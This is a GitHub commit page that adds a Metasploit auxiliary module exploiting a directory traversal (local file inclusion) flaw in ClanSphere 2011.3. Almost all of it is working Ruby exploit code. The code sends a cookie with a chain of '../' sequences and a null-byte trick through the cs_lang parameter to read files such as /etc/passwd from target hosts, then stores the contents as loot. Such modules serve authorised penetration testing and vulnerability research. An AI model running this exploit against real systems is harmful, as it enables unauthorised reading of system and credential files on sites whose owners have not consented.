Commit
This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
Add OSVDB-86720 - Clansphere dir traversarl
- Loading branch information
Showing
1 changed file
with
84 additions
and
0 deletions.
There are no files selected for viewing
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,84 @@ | ||
| ## | ||
| # This file is part of the Metasploit Framework and may be subject to | ||
| # redistribution and commercial restrictions. Please see the Metasploit | ||
| # Framework web site for more information on licensing and terms of use. | ||
| # http://metasploit.com/framework/ | ||
| ## | ||
|
|
||
| require 'msf/core' | ||
|
|
||
| class Metasploit3 < Msf::Auxiliary | ||
|
|
||
| include Msf::Exploit::Remote::HttpClient | ||
| include Msf::Auxiliary::Report | ||
| include Msf::Auxiliary::Scanner | ||
|
|
||
| def initialize(info = {}) | ||
| super(update_info(info, | ||
| 'Name' => 'ClanSphere 2011.3 Local File Inclusion Vulnerability', | ||
| 'Description' => %q{ | ||
| This module exploits a directory traversal flaw found in Clansphere 2011.3. | ||
| The application fails to handle the cs_lang parameter properly, which can be | ||
| used to read any file outside the virtual directory. | ||
| }, | ||
| 'References' => | ||
| [ | ||
| ['OSVDB', '86720'], | ||
| ['EDB', '22181'] | ||
| ], | ||
| 'Author' => | ||
| [ | ||
| 'blkhtc0rp', #Original | ||
| 'sinn3r' | ||
| ], | ||
| 'License' => MSF_LICENSE, | ||
| 'DisclosureDate' => "Oct 23 2012" | ||
| )) | ||
|
|
||
| register_options( | ||
| [ | ||
| OptString.new('TARGETURI', [true, 'The URI path to the web application', '/clansphere_2011.3/']), | ||
| OptString.new('FILE', [true, 'The file to obtain', '/etc/passwd']), | ||
| OptInt.new('DEPTH', [true, 'The max traversal depth to root directory', 10]) | ||
| ], self.class) | ||
| end | ||
|
|
||
|
|
||
| def run_host(ip) | ||
| base = target_uri.path | ||
| base << '/' if base[-1,1] != '/' | ||
|
|
||
| peer = "#{ip}:#{rport}" | ||
|
|
||
| print_status("#{peer} - Reading '#{datastore['FILE']}'") | ||
| traverse = "../" * datastore['DEPTH'] | ||
| res = send_request_cgi({ | ||
| 'method' => 'GET', | ||
| 'uri' => "#{base}index.php", | ||
| 'cookie' => "blah=blah; cs_lang=#{traverse}#{datastore['FILE']}%00.png" | ||
| }) | ||
|
|
||
| if res and res.body =~ /^Fatal error\:/ | ||
| print_error("Either '#{datastore['FILE']}' does not exist, or no permission.") | ||
|
|
||
| elsif res and res.code == 200 | ||
| pattern_end = " UTC +1 - Load:" | ||
| data = res.body.scan(/\<div id\=\"bottom\"\>\n(.+)\n\x20{5}UTC.+/m).flatten[0].lstrip | ||
| fname = datastore['FILE'] | ||
| p = store_loot( | ||
| 'clansphere.cms', | ||
| 'application/octet-stream', | ||
| ip, | ||
| data, | ||
| fname | ||
| ) | ||
|
|
||
| vprint_line(data) | ||
| print_good("#{peer} - #{fname} stored as '#{p}'") | ||
|
|
||
| else | ||
| print_error("#{peer} - Fail to obtain file for some unknown reason") | ||
| end | ||
| end | ||
|
|
||
| end |